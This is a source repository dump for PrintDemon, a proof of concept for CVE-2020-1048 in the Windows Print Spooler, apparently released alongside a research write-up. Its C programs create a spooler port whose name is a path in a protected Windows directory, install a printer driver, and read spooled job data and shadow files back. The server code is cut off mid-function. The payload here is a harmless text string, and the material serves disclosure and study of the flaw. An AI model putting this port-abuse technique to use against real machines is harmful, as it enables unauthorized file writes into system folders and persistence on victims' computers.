[ { "path": ".gitignore", "content": "## Ignore Visual Studio temporary files, build results, and\n## files generated by popular Visual Studio add-ons.\n##\n## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore\n\n# User-specific files\n*.rsuser\n*.suo\n*.user\n*.userosscache\n*.sln.docstates\n\n# User-specific files (MonoDevelop/Xamarin Studio)\n*.userprefs\n\n# Mono auto generated files\nmono_crash.*\n\n# Build results\n[Dd]ebug/\n[Dd]ebugPublic/\n[Rr]elease/\n[Rr]eleases/\nx64/\nx86/\n[Aa][Rr][Mm]/\n[Aa][Rr][Mm]64/\nbld/\n[Bb]in/\n[Oo]bj/\n[Ll]og/\n[Ll]ogs/\n\n# Visual Studio 2015/2017 cache/options directory\n.vs/\n# Uncomment if you have tasks that create the project's static files in wwwroot\n#wwwroot/\n\n# Visual Studio 2017 auto generated files\nGenerated\\ Files/\n\n# MSTest test Results\n[Tt]est[Rr]esult*/\n[Bb]uild[Ll]og.*\n\n# NUnit\n*.VisualState.xml\nTestResult.xml\nnunit-*.xml\n\n# Build Results of an ATL Project\n[Dd]ebugPS/\n[Rr]eleasePS/\ndlldata.c\n\n# Benchmark Results\nBenchmarkDotNet.Artifacts/\n\n# .NET Core\nproject.lock.json\nproject.fragment.lock.json\nartifacts/\n\n# StyleCop\nStyleCopReport.xml\n\n# Files built by Visual Studio\n*_i.c\n*_p.c\n*_h.h\n*.ilk\n*.meta\n*.obj\n*.iobj\n*.pch\n*.pdb\n*.ipdb\n*.pgc\n*.pgd\n*.rsp\n*.sbr\n*.tlb\n*.tli\n*.tlh\n*.tmp\n*.tmp_proj\n*_wpftmp.csproj\n*.log\n*.vspscc\n*.vssscc\n.builds\n*.pidb\n*.svclog\n*.scc\n\n# Chutzpah Test files\n_Chutzpah*\n\n# Visual C++ cache files\nipch/\n*.aps\n*.ncb\n*.opendb\n*.opensdf\n*.sdf\n*.cachefile\n*.VC.db\n*.VC.VC.opendb\n\n# Visual Studio profiler\n*.psess\n*.vsp\n*.vspx\n*.sap\n\n# Visual Studio Trace Files\n*.e2e\n\n# TFS 2012 Local Workspace\n$tf/\n\n# Guidance Automation Toolkit\n*.gpState\n\n# ReSharper is a .NET coding add-in\n_ReSharper*/\n*.[Rr]e[Ss]harper\n*.DotSettings.user\n\n# TeamCity is a build add-in\n_TeamCity*\n\n# DotCover is a Code Coverage Tool\n*.dotCover\n\n# AxoCover is a Code Coverage Tool\n.axoCover/*\n!.axoCover/settings.json\n\n# Visual Studio code coverage results\n*.coverage\n*.coveragexml\n\n# NCrunch\n_NCrunch_*\n.*crunch*.local.xml\nnCrunchTemp_*\n\n# MightyMoose\n*.mm.*\nAutoTest.Net/\n\n# Web workbench (sass)\n.sass-cache/\n\n# Installshield output folder\n[Ee]xpress/\n\n# DocProject is a documentation generator add-in\nDocProject/buildhelp/\nDocProject/Help/*.HxT\nDocProject/Help/*.HxC\nDocProject/Help/*.hhc\nDocProject/Help/*.hhk\nDocProject/Help/*.hhp\nDocProject/Help/Html2\nDocProject/Help/html\n\n# Click-Once directory\npublish/\n\n# Publish Web Output\n*.[Pp]ublish.xml\n*.azurePubxml\n# Note: Comment the next line if you want to checkin your web deploy settings,\n# but database connection strings (with potential passwords) will be unencrypted\n*.pubxml\n*.publishproj\n\n# Microsoft Azure Web App publish settings. Comment the next line if you want to\n# checkin your Azure Web App publish settings, but sensitive information contained\n# in these scripts will be unencrypted\nPublishScripts/\n\n# NuGet Packages\n*.nupkg\n# NuGet Symbol Packages\n*.snupkg\n# The packages folder can be ignored because of Package Restore\n**/[Pp]ackages/*\n# except build/, which is used as an MSBuild target.\n!**/[Pp]ackages/build/\n# Uncomment if necessary however generally it will be regenerated when needed\n#!**/[Pp]ackages/repositories.config\n# NuGet v3's project.json files produces more ignorable files\n*.nuget.props\n*.nuget.targets\n\n# Microsoft Azure Build Output\ncsx/\n*.build.csdef\n\n# Microsoft Azure Emulator\necf/\nrcf/\n\n# Windows Store app package directories and files\nAppPackages/\nBundleArtifacts/\nPackage.StoreAssociation.xml\n_pkginfo.txt\n*.appx\n*.appxbundle\n*.appxupload\n\n# Visual Studio cache files\n# files ending in .cache can be ignored\n*.[Cc]ache\n# but keep track of directories ending in .cache\n!?*.[Cc]ache/\n\n# Others\nClientBin/\n~$*\n*~\n*.dbmdl\n*.dbproj.schemaview\n*.jfm\n*.pfx\n*.publishsettings\norleans.codegen.cs\n\n# Including strong name files can present a security risk\n# (https://github.com/github/gitignore/pull/2483#issue-259490424)\n#*.snk\n\n# Since there are multiple workflows, uncomment next line to ignore bower_components\n# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)\n#bower_components/\n\n# RIA/Silverlight projects\nGenerated_Code/\n\n# Backup & report files from converting an old project file\n# to a newer Visual Studio version. Backup files are not needed,\n# because we have git ;-)\n_UpgradeReport_Files/\nBackup*/\nUpgradeLog*.XML\nUpgradeLog*.htm\nServiceFabricBackup/\n*.rptproj.bak\n\n# SQL Server files\n*.mdf\n*.ldf\n*.ndf\n\n# Business Intelligence projects\n*.rdl.data\n*.bim.layout\n*.bim_*.settings\n*.rptproj.rsuser\n*- [Bb]ackup.rdl\n*- [Bb]ackup ([0-9]).rdl\n*- [Bb]ackup ([0-9][0-9]).rdl\n\n# Microsoft Fakes\nFakesAssemblies/\n\n# GhostDoc plugin setting file\n*.GhostDoc.xml\n\n# Node.js Tools for Visual Studio\n.ntvs_analysis.dat\nnode_modules/\n\n# Visual Studio 6 build log\n*.plg\n\n# Visual Studio 6 workspace options file\n*.opt\n\n# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)\n*.vbw\n\n# Visual Studio LightSwitch build output\n**/*.HTMLClient/GeneratedArtifacts\n**/*.DesktopClient/GeneratedArtifacts\n**/*.DesktopClient/ModelManifest.xml\n**/*.Server/GeneratedArtifacts\n**/*.Server/ModelManifest.xml\n_Pvt_Extensions\n\n# Paket dependency manager\n.paket/paket.exe\npaket-files/\n\n# FAKE - F# Make\n.fake/\n\n# CodeRush personal settings\n.cr/personal\n\n# Python Tools for Visual Studio (PTVS)\n__pycache__/\n*.pyc\n\n# Cake - Uncomment if you are using it\n# tools/**\n# !tools/packages.config\n\n# Tabs Studio\n*.tss\n\n# Telerik's JustMock configuration file\n*.jmconfig\n\n# BizTalk build output\n*.btp.cs\n*.btm.cs\n*.odx.cs\n*.xsd.cs\n\n# OpenCover UI analysis results\nOpenCover/\n\n# Azure Stream Analytics local run output\nASALocalRun/\n\n# MSBuild Binary and Structured Log\n*.binlog\n\n# NVidia Nsight GPU debugger configuration file\n*.nvuser\n\n# MFractors (Xamarin productivity tool) working folder\n.mfractor/\n\n# Local History for Visual Studio\n.localhistory/\n\n# BeatPulse healthcheck temp database\nhealthchecksdb\n\n# Backup folder for Package Reference Convert tool in Visual Studio 2017\nMigrationBackup/\n\n# Ionide (cross platform F# VS Code tools) working folder\n.ionide/\n" }, { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2020 Alex Ionescu\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "# PrintDemon (CVE-2020-1048)\n\nPrintDemon is a PoC for a series of issues in the Windows Print Spooler service, as well as potetial misuses of the functionality. Please read https://windows-internals.com/printdemon-cve-2020-1048/ for all of the information.\n" }, { "path": "printclient/pclient.c", "content": "#include \n#include \n#include \"..\\shdfile4.h\"\n\nINT\nmain(\n _In_ INT ArgumentCount,\n _In_ PCHAR Arguments[]\n )\n{\n PRINTER_DEFAULTS printerDefaults;\n BOOL bRes;\n HANDLE hPrinter;\n PJOB_INFO_4 jobInfo;\n DWORD dwNeeded, dwReturned;\n PPRINTER_INFO_4 printerInfo, currentInfo;\n PPRINTER_INFO_2 printerFullInfo;\n LPWSTR printerName;\n WCHAR jobName[64];\n HANDLE hJob;\n DWORD dwError;\n PCHAR printerData;\n WCHAR spoolDir[MAX_PATH];\n SHADOWFILE_4 shadowFileData;\n PSHADOWFILE_4 pShadowFileData;\n\n //\n // First see how much space we need\n //\n dwNeeded = 0;\n dwReturned = 0;\n bRes = EnumPrinters(PRINTER_ENUM_LOCAL, NULL, 4, NULL, 0, &dwNeeded, &dwReturned);\n if ((bRes != FALSE) || (dwNeeded == 0))\n {\n printf(\"Error: %lx\\n\", GetLastError());\n return -1;\n }\n\n //\n // Allocate it\n //\n printerInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNeeded);\n if (printerInfo == NULL)\n {\n printf(\"Error: %lx\\n\", GetLastError());\n return NULL;\n }\n\n //\n // Now enumerate the printer\n //\n bRes = EnumPrinters(PRINTER_ENUM_LOCAL,\n NULL,\n 4,\n (LPBYTE)printerInfo,\n dwNeeded,\n &dwNeeded,\n &dwReturned);\n if (bRes == FALSE)\n {\n printf(\"Error: %lx\\n\", GetLastError());\n HeapFree(GetProcessHeap(), 0, printerInfo);\n return -1;\n }\n \n //\n // Enumerate all the printers\n //\n printerName = NULL;\n currentInfo = printerInfo;\n while (dwReturned--)\n {\n //\n // Check for attributes that indicate ours\n //\n if ((currentInfo->Attributes & (PRINTER_ATTRIBUTE_HIDDEN |\n PRINTER_ATTRIBUTE_RAW_ONLY |\n PRINTER_ATTRIBUTE_LOCAL)) ==\n (PRINTER_ATTRIBUTE_HIDDEN |\n PRINTER_ATTRIBUTE_RAW_ONLY |\n PRINTER_ATTRIBUTE_LOCAL))\n {\n //\n // We found it!\n //\n printf(\"[+] Found IPC Printer: %S (status = %lx)\\n\",\n currentInfo->pPrinterName, currentInfo->Attributes);\n printerName = currentInfo->pPrinterName;\n break;\n }\n currentInfo++;\n }\n\n //\n // Check if we found our printer\n //\n if (printerName == NULL)\n {\n printf(\"[-] Couldn't find IPC printer!\\n\");\n return -1;\n }\n\n //\n // We did, go open it, and then free the name/info structure\n //\n printerDefaults.pDatatype = NULL;\n printerDefaults.pDevMode = NULL;\n printerDefaults.DesiredAccess = PRINTER_ALL_ACCESS;\n bRes = OpenPrinter(printerName, &hPrinter, &printerDefaults);\n HeapFree(GetProcessHeap(), 0, printerInfo);\n if (bRes == FALSE)\n {\n printf(\"Failed to open printer: %lx\\n\", GetLastError());\n return -1;\n }\n\n //\n // Check how much space we needed for the printer information\n //\n bRes = GetPrinter(hPrinter, 2, NULL, 0, &dwNeeded);\n if (bRes != FALSE)\n {\n printf(\"Unexpected success querying printer\\n\");\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // Allocate it\n //\n printerFullInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNeeded);\n if (printerFullInfo == NULL)\n {\n printf(\"Out of memory\\n\");\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // Now query it\n //\n bRes = GetPrinter(hPrinter,\n 2,\n (LPBYTE)printerFullInfo,\n dwNeeded,\n &dwNeeded);\n if (bRes == FALSE)\n {\n printf(\"Failed to query printer: %lx\\n\", GetLastError());\n HeapFree(GetProcessHeap(), 0, printerFullInfo);\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // Make sure someone published some data to it\n //\n if (printerFullInfo->cJobs != 1)\n {\n printf(\"Printer doesn't have an active job: %lx\\n\", printerFullInfo->cJobs);\n HeapFree(GetProcessHeap(), 0, printerFullInfo);\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // Enumerate the first (and only) job -- see how much space is needed for it\n //\n HeapFree(GetProcessHeap(), 0, printerFullInfo);\n bRes = EnumJobs(hPrinter, 0, 1, 4, NULL, 0, &dwNeeded, &dwReturned);\n if ((bRes != FALSE) && (dwReturned != 0))\n {\n printf(\"Failed to enumerate jobs: %lx\\n\", GetLastError());\n ClosePrinter(hPrinter);\n return -1;\n }\n else if (dwNeeded == 0)\n {\n printf(\"[-] No printer job active!\\n\");\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // Allocate space for it\n //\n jobInfo = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNeeded);\n if (jobInfo == NULL)\n {\n printf(\"Out of memory\\n\");\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // Now enumerate information on this job\n //\n bRes = EnumJobs(hPrinter,\n 0,\n 1,\n 4,\n (LPBYTE)jobInfo,\n dwNeeded,\n &dwNeeded,\n &dwReturned);\n if (bRes == FALSE)\n {\n printf(\"Error enumerating job: %lx\\n\", GetLastError());\n HeapFree(GetProcessHeap(), 0, jobInfo);\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // Print some information on the job based on the API\n //\n printf(\"[+] Found IPC Job\\n\");\n printf(\"[.]\\tJob ID: %d\\n\", jobInfo->JobId);\n printf(\"[.]\\tQueued by: %S on %S\\n\",\n jobInfo->pUserName, jobInfo->pMachineName);\n printf(\"[.]\\tSD: %p\\n\", jobInfo->pSecurityDescriptor);\n printf(\"[.]\\tDocument Name: %S and type: %S\\n\",\n jobInfo->pDocument, jobInfo->pDatatype);\n printf(\"[.]\\tJob Status: %lx (%S)\\n\",\n jobInfo->Status, jobInfo->pStatus);\n printf(\"[.]\\tPriority: %d Position: %d\\n\",\n jobInfo->Priority, jobInfo->Position);\n printf(\"[.]\\tData Size: %lld bytes (%d pages total, %d printed so far)\\n\",\n (DWORD64)jobInfo->SizeHigh << 32ULL | jobInfo->Size,\n jobInfo->TotalPages, jobInfo->PagesPrinted);\n printf(\"[.]\\tTime: %d Start Time: %d End Time: %d\\n\",\n jobInfo->Time, jobInfo->StartTime, jobInfo->UntilTime);\n printf(\"[.]\\tSubmitted on %d/%d/%d at %d:%d:%d.%d\\n\",\n jobInfo->Submitted.wMonth, jobInfo->Submitted.wDay, jobInfo->Submitted.wYear,\n jobInfo->Submitted.wHour, jobInfo->Submitted.wMinute, jobInfo->Submitted.wSecond,\n jobInfo->Submitted.wMilliseconds);\n\n //\n // Get the spooler directory\n //\n dwError = GetPrinterData(hPrinter,\n SPLREG_DEFAULT_SPOOL_DIRECTORY,\n NULL,\n (LPBYTE)spoolDir,\n sizeof(spoolDir),\n &dwNeeded);\n if (dwError != ERROR_SUCCESS)\n {\n printf(\"Failed getting spooler directory: %lx\\n\", GetLastError());\n HeapFree(GetProcessHeap(), 0, jobInfo);\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // Done with the printer\n //\n ClosePrinter(hPrinter);\n\n //\n // Open the shadow file based on the expected name\n //\n HANDLE hShadowFile;\n WCHAR shadowFileName[MAX_PATH];\n wsprintf(shadowFileName, L\"%s\\\\%05d.SHD\", spoolDir, jobInfo->JobId);\n printf(\"[.] Opening %S\\n\", shadowFileName);\n hShadowFile = CreateFile(shadowFileName,\n GENERIC_READ,\n 0,\n NULL,\n OPEN_EXISTING,\n FILE_ATTRIBUTE_NORMAL,\n NULL);\n if (hShadowFile == INVALID_HANDLE_VALUE)\n {\n printf(\"[-] Couldn't find shadow file (it can have any name it wants): %lx\\n\",\n GetLastError());\n HeapFree(GetProcessHeap(), 0, jobInfo);\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // Read the shadow file\n //\n bRes = ReadFile(hShadowFile,\n &shadowFileData,\n sizeof(shadowFileData),\n &dwReturned,\n NULL);\n if ((bRes == FALSE) || (dwReturned != sizeof(shadowFileData)))\n {\n printf(\"[-] Error reading shadow file: %lx\\n\", GetLastError());\n HeapFree(GetProcessHeap(), 0, jobInfo);\n CloseHandle(hShadowFile);\n ClosePrinter(hPrinter);\n return -1;\n }\n\n //\n // We only support Version 4\n //\n if ((shadowFileData.Version != SF_VERSION_4) ||\n (shadowFileData.HeaderSize != sizeof(shadowFileData)) ||\n (shadowFileData.signature != SF_SIGNATURE_4))\n {\n printf(\"[-] Unrecognized shadow file format\\n\");\n HeapFree(GetProcessHeap(), 0, jobInfo);\n CloseHandle(hShadowFile);\n return -1;\n }\n\n //\n // Make sure it's for this job\n //\n if (shadowFileData.JobId != jobInfo->JobId)\n {\n printf(\"[-] Job ID mismatch: %d\\n\", shadowFileData.JobId);\n HeapFree(GetProcessHeap(), 0, jobInfo);\n CloseHandle(hShadowFile);\n return -1;\n }\n \n //\n // Get the size of the shadow spool file\n //\n dwNeeded = GetFileSize(hShadowFile, NULL);\n if (dwNeeded == 0)\n {\n printf(\"Error getting file size: %lx\\n\", GetLastError());\n HeapFree(GetProcessHeap(), 0, jobInfo);\n CloseHandle(hShadowFile);\n return -1;\n }\n\n //\n // Allocate data for it\n //\n pShadowFileData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, dwNeeded);\n if (pShadowFileData == NULL)\n {\n printf(\"Out of memory\\n\");\n HeapFree(GetProcessHeap(), 0, jobInfo);\n CloseHandle(hShadowFile);\n return -1;\n }\n\n //\n // Go back to the start\n //\n SetFilePointer(hShadowFile, 0, NULL, SEEK_SET);\n\n //\n // Read the full file this time around\n //\n bRes = ReadFile(hShadowFile,\n pShadowFileData,\n dwNeeded,\n &dwReturned,\n NULL);\n if ((bRes == FALSE) || (dwReturned != dwNeeded))\n {\n printf(\"[-] Error reading shadow file: %lx\\n\", GetLastError());\n HeapFree(GetProcessHeap(), 0, jobInfo);\n CloseHandle(hShadowFile);\n return -1;\n }\n\n //\n // We no longer need the shadow file\n //\n CloseHandle(hShadowFile);\n\n //\n // Print the data from the shadow file\n //\n printf(\"[+] Found Shadow File Job\\n\");\n printf(\"[.]\\tJob ID: %d\\n\", pShadowFileData->JobId);\n printf(\"[.]\\tQueued by: %S on %S\\n\",\n (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pUser),\n (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pMachineName));\n printf(\"[.]\\tSD: %p\\n\", (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pSecurityDescriptor));\n printf(\"[.]\\tDocument Name: %S and type: %S\\n\",\n (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pDocument),\n (PWCHAR)((ULONG_PTR)pShadowFileData + (ULONG_PTR)pShadowFileData->pDatatype));\n printf(\"[.]\\tJob Status: %lx\\n\",\n pShadowFileData->Status);\n printf(\"[.]\\tPriority: %d\\n\",\n pShadowFileData->Priority);\n printf(\"[.]\\tData Size: %lld bytes (%d pages total)\\n\",\n (DWORD64)pShadowFileData->SizeHigh << 32ULL | pShadowFileData->Size,\n pShadowFileData->cPages);\n printf(\"[.]\\tStart Time: %d End Time: %d\\n\",\n pShadowFileData->StartTime, pShadowFileData->UntilTime);\n printf(\"[.]\\tSubmitted on %d/%d/%d at %d:%d:%d.%d\\n\",\n pShadowFileData->Submitted.wMonth, pShadowFileData->Submitted.wDay, pShadowFileData->Submitted.wYear,\n pShadowFileData->Submitted.wHour, pShadowFileData->Submitted.wMinute, pShadowFileData->Submitted.wSecond,\n pShadowFileData->Submitted.wMilliseconds);\n\n //\n // Open the print job\n //\n wsprintf(jobName, L\"%s,Job %d\", jobInfo->pPrinterName, jobInfo->JobId);\n bRes = OpenPrinter(jobName, &hJob, NULL);\n if (bRes == FALSE)\n {\n printf(\"Failed to open printer job: %lx\\n\", GetLastError());\n return -1;\n }\n\n //\n // Allocate space for the printer data\n //\n printerData = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, jobInfo->Size);\n if (printerData == NULL)\n {\n printf(\"Out of memory\\n\");\n HeapFree(GetProcessHeap(), 0, jobInfo);\n ClosePrinter(hJob);\n return -1;\n }\n\n //\n // Read printer data\n //\n printf(\"[.] Reading %d bytes of data from printer\\n\", jobInfo->Size);\n bRes = ReadPrinter(hJob, printerData, jobInfo->Size, &dwNeeded);\n if (bRes == FALSE)\n {\n printf(\"Failed to read printer data: %lx\\n\", GetLastError());\n HeapFree(GetProcessHeap(), 0, printerData);\n HeapFree(GetProcessHeap(), 0, jobInfo);\n ClosePrinter(hJob);\n return -1;\n }\n\n //\n // Print it out (assume it's a string)\n //\n printf(\"[+] Printer Data: %s\\n\", printerData);\n\n //\n // All done here\n //\n HeapFree(GetProcessHeap(), 0, printerData);\n HeapFree(GetProcessHeap(), 0, jobInfo);\n ClosePrinter(hJob);\n return 0;\n}\n\n" }, { "path": "printclient/printclient.vcxproj", "content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n 16.0\n Win32Proj\n {26e2f7f8-6626-4f1c-8f23-26baa7253cb2}\n printclient\n 10.0\n \n \n \n Application\n true\n v142\n Unicode\n \n \n Application\n false\n v142\n Unicode\n \n \n Application\n true\n v142\n Unicode\n \n \n Application\n false\n v142\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n \n \n true\n \n \n false\n \n \n false\n \n \n \n Level3\n true\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n \n \n \n \n Level3\n true\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n \n \n \n \n Level3\n true\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n \n \n \n \n \n \n Level3\n true\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n true\n \n \n \n \n \n \n \n \n" }, { "path": "printdemon.sln", "content": "\nMicrosoft Visual Studio Solution File, Format Version 12.00\n# Visual Studio Version 16\nVisualStudioVersion = 16.0.29911.98\nMinimumVisualStudioVersion = 10.0.40219.1\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"printserver\", \"printserver\\printserver.vcxproj\", \"{B18A8548-199C-48BF-981B-18B8CA43FA9A}\"\nEndProject\nProject(\"{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}\") = \"printclient\", \"printclient\\printclient.vcxproj\", \"{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}\"\nEndProject\nGlobal\n\tGlobalSection(SolutionConfigurationPlatforms) = preSolution\n\t\tDebug|x64 = Debug|x64\n\t\tDebug|x86 = Debug|x86\n\t\tRelease|x64 = Release|x64\n\t\tRelease|x86 = Release|x86\n\tEndGlobalSection\n\tGlobalSection(ProjectConfigurationPlatforms) = postSolution\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Debug|x64.Build.0 = Debug|x64\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Debug|x86.Build.0 = Debug|Win32\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Release|x64.ActiveCfg = Release|x64\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Release|x64.Build.0 = Release|x64\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Release|x86.ActiveCfg = Release|Win32\n\t\t{B18A8548-199C-48BF-981B-18B8CA43FA9A}.Release|x86.Build.0 = Release|Win32\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Debug|x64.ActiveCfg = Debug|x64\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Debug|x64.Build.0 = Debug|x64\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Debug|x86.ActiveCfg = Debug|Win32\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Debug|x86.Build.0 = Debug|Win32\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Release|x64.ActiveCfg = Release|x64\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Release|x64.Build.0 = Release|x64\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Release|x86.ActiveCfg = Release|Win32\n\t\t{26E2F7F8-6626-4F1C-8F23-26BAA7253CB2}.Release|x86.Build.0 = Release|Win32\n\tEndGlobalSection\n\tGlobalSection(SolutionProperties) = preSolution\n\t\tHideSolutionNode = FALSE\n\tEndGlobalSection\n\tGlobalSection(ExtensibilityGlobals) = postSolution\n\t\tSolutionGuid = {DB264CF3-973B-40A9-AA22-6BD94600603A}\n\tEndGlobalSection\nEndGlobal\n" }, { "path": "printserver/printserver.vcxproj", "content": "\n\n \n \n Debug\n Win32\n \n \n Release\n Win32\n \n \n Debug\n x64\n \n \n Release\n x64\n \n \n \n 16.0\n Win32Proj\n {b18a8548-199c-48bf-981b-18b8ca43fa9a}\n printploit\n 10.0\n printserver\n \n \n \n Application\n true\n v142\n Unicode\n \n \n Application\n false\n v142\n Unicode\n \n \n Application\n true\n v142\n Unicode\n \n \n Application\n false\n v142\n Unicode\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n true\n \n \n false\n \n \n true\n \n \n false\n \n \n \n Level3\n true\n WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n \n \n \n \n Level3\n true\n true\n true\n WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n false\n \n \n \n \n Level4\n true\n _DEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n ProgramDatabase\n Default\n MultiThreadedDebug\n true\n true\n \n \n Console\n true\n ws2_32.lib;ntdll.lib;kernel32.lib;user32.lib;gdi32.lib;winspool.lib;comdlg32.lib;advapi32.lib;shell32.lib;ole32.lib;oleaut32.lib;uuid.lib;odbc32.lib;odbccp32.lib;%(AdditionalDependencies)\n AsInvoker\n \n \n false\n \n \n \n \n Level3\n true\n true\n true\n NDEBUG;_CONSOLE;%(PreprocessorDefinitions)\n true\n \n \n Console\n true\n true\n false\n \n \n \n \n \n \n \n \n" }, { "path": "printserver/pserver.c", "content": "#include \n#include \n\nLPWSTR g_DriverName = L\"Generic / Text Only\";\nLPWSTR g_PortName = L\"c:\\\\windows\\\\tracing\\\\demoport.txt\";\nLPWSTR g_PrinterName = L\"PrintDemon\";\n\nINT\nmain (\n _In_ INT ArgumentCount,\n _In_ PCHAR Arguments[]\n )\n{\n HRESULT hr;\n PRINTER_INFO_2 printerInfo;\n HANDLE hPrinter;\n HANDLE hMonitor;\n BOOL bRes;\n DWORD dwNeeded, dwStatus;\n PRINTER_DEFAULTS printerDefaults;\n DWORD dwExists;\n struct\n {\n ADDJOB_INFO_1 jobInfo;\n WCHAR pathString[MAX_PATH];\n } job;\n BOOL bPrintWithSpooler;\n DWORD dwJobId;\n PCHAR printerData = \"Hello! This is data from your printer :-)\";\n DOC_INFO_1 docInfo;\n HANDLE hSpool;\n\n //\n // Initialize variables\n //\n UNREFERENCED_PARAMETER(Arguments);\n ZeroMemory(&job, sizeof(job));\n bPrintWithSpooler = TRUE;\n hPrinter = NULL;\n hMonitor = NULL;\n if (ArgumentCount > 1)\n {\n bPrintWithSpooler = FALSE;\n }\n\n //\n // Open a handle to the XCV port of the local spooler\n //\n printerDefaults.pDatatype = NULL;\n printerDefaults.pDevMode = NULL;\n printerDefaults.DesiredAccess = SERVER_ACCESS_ADMINISTER;\n bRes = OpenPrinter(L\",XcvMonitor Local Port\", &hMonitor, &printerDefaults);\n if (bRes == FALSE)\n {\n printf(\"Error opening XCV handle: %lx\\n\", GetLastError());\n goto CleanupPath;\n }\n\n //\n // Check if the target port name already exists \n //\n dwNeeded = ((DWORD)wcslen(g_PortName) + 1) * sizeof(WCHAR);\n dwExists = 0;\n bRes = XcvData(hMonitor,\n L\"PortExists\",\n (LPBYTE)g_PortName,\n dwNeeded,\n (LPBYTE)&dwExists,\n sizeof(dwExists),\n &dwNeeded,\n &dwStatus);\n if (dwExists == 0)\n {\n //\n // It doesn't, so create it!\n //\n dwNeeded = ((DWORD)wcslen(g_PortName) + 1) * sizeof(WCHAR);\n bRes = XcvData(hMonitor,\n L\"AddPort\",\n (LPBYTE)g_PortName,\n dwNeeded,\n NULL,\n 0,\n &dwNeeded,\n &dwStatus);\n if (bRes == FALSE)\n {\n printf(\"Failed to add port: %lx\\n\", dwStatus);\n goto CleanupPath;\n }\n }\n\n //\n // Check if the printer already exists\n //\n printerDefaults.pDatatype = NULL;\n printerDefaults.pDevMode = NULL;\n printerDefaults.DesiredAccess = PRINTER_ALL_ACCESS;\n bRes = OpenPrinter(g_PrinterName, &hPrinter, &printerDefaults);\n if ((bRes == FALSE) && (GetLastError() == ERROR_INVALID_PRINTER_NAME))\n {\n //\n // First, install the generic text only driver. Because this is already\n // installed, no privileges are required to do so.\n //\n hr = InstallPrinterDriverFromPackage(NULL, NULL, g_DriverName, NULL, 0);\n if (FAILED(hr))\n {\n printf(\"Failed to install print driver: %lx\\n\", hr);\n goto 